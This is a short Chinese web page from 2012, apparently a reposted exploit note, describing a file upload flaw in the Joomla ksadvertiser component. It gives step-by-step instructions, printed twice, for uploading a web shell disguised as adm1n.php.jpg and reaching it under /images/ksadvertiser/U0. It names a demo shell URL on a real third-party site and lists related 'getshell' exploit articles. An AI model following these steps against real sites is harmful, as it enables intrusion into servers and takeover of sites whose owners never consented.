Joomla远程上传漏洞 可直接getshell
2012-08-15 16:39
666 查看
作者:1337
1. 有些joomal需要先注册.
http://site/index. href="http://www.2cto.com/kf/web/php/" target=_blank>php?option=com_user&view=login
2. 到上传地址
http://www.2cto.com /index.php?option=com_ksadvertiser&Itemid=36&task=add&catid=0&lang=en
3. 点击image后点击upload,选择shell, 将shell重名为adm1n.php.jpg格式.
4. 上传后的文件在/ images/ksadvertiser/U0 这个目录下.
http://site/images/ksadvertiser/U0/adm1n.php.gif
Demo: http://alt.kiss-software.de/images/ksadvertiser/U0/403.php.gif
修复:
已通知官方
1. 有些joomal需要先注册.
http://site/index. href="http://www.2cto.com/kf/web/php/" target=_blank>php?option=com_user&view=login
2. 到上传地址
http://www.2cto.com /index.php?option=com_ksadvertiser&Itemid=36&task=add&catid=0&lang=en
3. 点击image后点击upload,选择shell, 将shell重名为adm1n.php.jpg格式.
4. 上传后的文件在/ images/ksadvertiser/U0 这个目录下.
http://site/images/ksadvertiser/U0/adm1n.php.gif
Demo: http://alt.kiss-software.de/images/ksadvertiser/U0/403.php.gif
修复:
已通知官方
相关文章推荐
- Joomla 远程上传漏洞.直接getshell
- PHPcms9.6.0 最新版任意文件上传漏洞(直接getshell)
- Joomla![1.5-3.4.5]反序列化远程代码执行EXP(直接写shell)
- [代码审计]XiaoCms(后台任意文件上传至getshell,任意目录删除,会话固定漏洞)
- Ewebeditor 2.1.6上传漏洞 UNION运用-直接得SHELL
- Linux下自动备份MySQL数据库并上传到远程FTP服务器且删除指定日期前的备份Shell脚本
- xiaocms文件上传GETSHELL
- shell ssh sftp 远程自动部署(上传文件)
- 狂盗小说小偷GETshell漏洞
- 远程文件上传漏洞phuploader
- Discuz X3.2UC漏洞直接拿shell论坛创始人无视验证码爆破
- metinfo多个漏洞(可getshell)
- MetInfo 3.0 PHP代码注入漏洞(getshell)
- Bash Shellshock(Bash远程代码执行)漏洞分析及利用思路
- Joom la com_ksadvertiser远程文件上传漏洞
- PJBlog 3.2.9.518 getwebshell 漏洞
- 一个自动打包并上传到远程FTP的shell脚本
- shell 将本地目录以及下面目录上传到远程ftp服务器上
- Didcuz memcache+ssrf GETSHELL漏洞
- Didcuz memcache+ssrf GETSHELL漏洞解决方法